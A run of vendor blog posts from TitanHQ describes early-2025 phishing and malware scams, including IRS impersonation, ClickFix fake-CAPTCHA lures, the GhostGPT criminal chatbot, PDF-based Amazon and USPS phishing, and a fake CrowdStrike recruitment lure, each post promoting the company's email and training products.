TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.
With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam
In the United States, tax returns for the previous year need to be filed before Tax Day, which falls on Tuesday, April 15, 2025. Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) started accepting tax returns for 2024. Tax season is a popular time for cybercriminals who take advantage of individuals and businesses that are under pressure to file their annual tax returns and try to steal personal information to file fraudulent tax returns in victims’ names and for other nefarious purposes.
Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.
The website to which the user is directed mimics the official IRS site and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering they have been scammed when they file their tax return and are notified by the IRS that it is a duplicate. Alternatively, they are told that they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax return require personal information and bank account details to be disclosed.
Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.
According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.
Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters will perform a range of checks on inbound email, including reputation checks of the sender’s domain and email address, anti-spoofing checks, checks of blacklists of malicious IP addresses, and the email content will be assessed for malicious links, common signatures of phishing, and email attachments will be checked using anti-virus software. While these methods will identify the vast majority of spam emails and many phishing attempts, these checks are no longer sufficient.
The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.
SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.
by titanadmin | Jan 26, 2025 | Phishing & Email Spam
Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high percentage chance that the emails will land in the inbox of someone that uses the products of those companies.
In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.
Phishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution to remove the software and prevent the charge. The software gives the threat actor full control of their device.
The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.
One user received a call where a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.
The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.
Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.
Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.
An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud based anti spam software incorporates machine learning capable of identifying previous unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.
by titanadmin | Jan 26, 2025 | Internet Security, Phishing & Email Spam, Spam Software
Cybercriminals are increasingly conducting a type of social engineering technique dubbed ClickFix to gain persistent access to victims’ networks. ClickFix attacks involve social engineering to trick the victim into installing malware. ClickFix attacks were first identified in early 2024, and the use of this tactic has been increasing. These attacks take advantage of users’ desire to quickly resolve IT issues without having to inform their IT department. Resolving issues can take time, and usually involves raising a support ticket with the IT department. In ClickFix attacks, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.
The aim of these attacks is to trick the user into running a PowerShell command, which will ultimately deliver malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote action trojan, and the DarkGate loader, although any number of malware variants could be delivered using this technique. Multiple threat groups have been observed using this technique.
The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.
Malicious links have been distributed in phishing emails that direct users to sites impersonating software solutions such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites where they create pop-ups, which appear when visitors land on the site warning them about a fictitious security issue. Fake CAPTCHA prompts are often used, where the user is told they must verify that they are human before being allowed to proceed. As part of the verification process, a command is copied to the clipboard, and the user is told to press the Windows key + R, then CTRL + V, and then enter, thus executing the script and triggering a malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many different financially motivated cybercriminal groups.
To defend against Clickfix attacks, businesses need to implement multiple mitigations to prevent these attacks from succeeding, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should be conducted to improve understanding of the phishing and social engineering techniques used by threat actors, including specific training content to teach employees how to identify and avoid clickfix attacks. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated clickfix attacks.
An advanced spam filter is essential for blocking malicious emails. TitanHQ’s SpamTitan suite of solutions includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud based anti spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify the threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate, and a 99.999% spam catch rate.
Web filtering solutions should be used to protect against the web-based component of clickfix attacks since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled webpages used in clickfix attacks. WebTitan can also prevent downloads of certain file extensions from the Internet and can also be used to control the categories of websites that employees can visit.
With regular security awareness training, email security, and web security delivered through SafeTitan SpamTitan, and WebTitan, businesses will be well protected from Clickfix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Jan 25, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
A new AI chatbot has been released specifically for use by cybercriminals that has been developed to assist with malware development, phishing campaigns, and business email compromise attacks. The new chatbot is called GhostGPT, and follows the release of WormGPT, WolfGPT, and EscapeGPT which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots which will not generate responses to queries related to criminality. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM), ensuring queries are not subject to censorship. The tool is offered on Telegram and for a fee, the tool can be immediately used.
There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. These tools can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails. The researchers found their AI-generated emails had a 54% click rate.
These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.
Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.
SpamTitan, TitanHQ’s spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats from their behavior rather than their signature. In the Q4, 2024, tests by VirusBulletin, the engine that powers SpamTitan and TitanHQ’s Microsoft 365 anti-phishing solution – PhishTitan – ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.
The high percentage of individuals fooled by ai-generated phishing emails highlights the importance of conducting regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and highlight the individuals who are failing to apply their training to the emails they receive on a daily basis. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.
Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TItanHS’s solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 20, 2025 | Phishing & Email Spam
New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.
Amazon Prime Phishing Campaign
The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.
Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.
If the link is clicked, the user is directed to a URL (a duckdns.org subdomain) that displays an exact copy of the Amazon sign-in page. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.
US Postal Service Phishing Campaign
A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.
Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.
Improve Your Phishing Defenses
These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.
Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.
TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.
TitanHQ’s cloud-based anti-spam service – SpamTitan is an advanced email security solution for blocking the full range of email threats including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved 1st spot for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.
For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam
Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.
These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, job applications, and completing homework, translating from one language to another, creating summaries of text to pull out the key points, and writing and debugging code to name just a few applications.
When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.
Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.
Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack these easily identified red flags.
While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.
A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.
For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.
The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.
What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.
AI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used for defensive purposes and can identify the phishing content that humans struggle to identify. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.
SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams will be able to sleep easily.
For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam, Security Awareness
A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding offering an Interview with the company.
The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team; however, this year, the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which triggers the download of a fake application for scheduling the interview. Recipients are given the option of downloading a Windows or MacOS version of the application; however, the downloaded file is an XMRig installer. When executed, checks are performed of the environment to determine if a debugger is attached to the process, the device is checked to ensure it has two cores and is suitable for cryptocurrency mining, and checks are performed to identify virtualization and running processes to prevent execution in a sandbox environment. If the checks are passed, a copy of XMRig is downloaded from GitHub and executed. If the checks are passed, the user is presented with an error message, advising them that the installation has failed, potentially due to a hardware compatibility issue. The user is told to try again by downloading the application on another device, potentially infecting a second device with XMRig.
Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.
The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.
For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.
The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.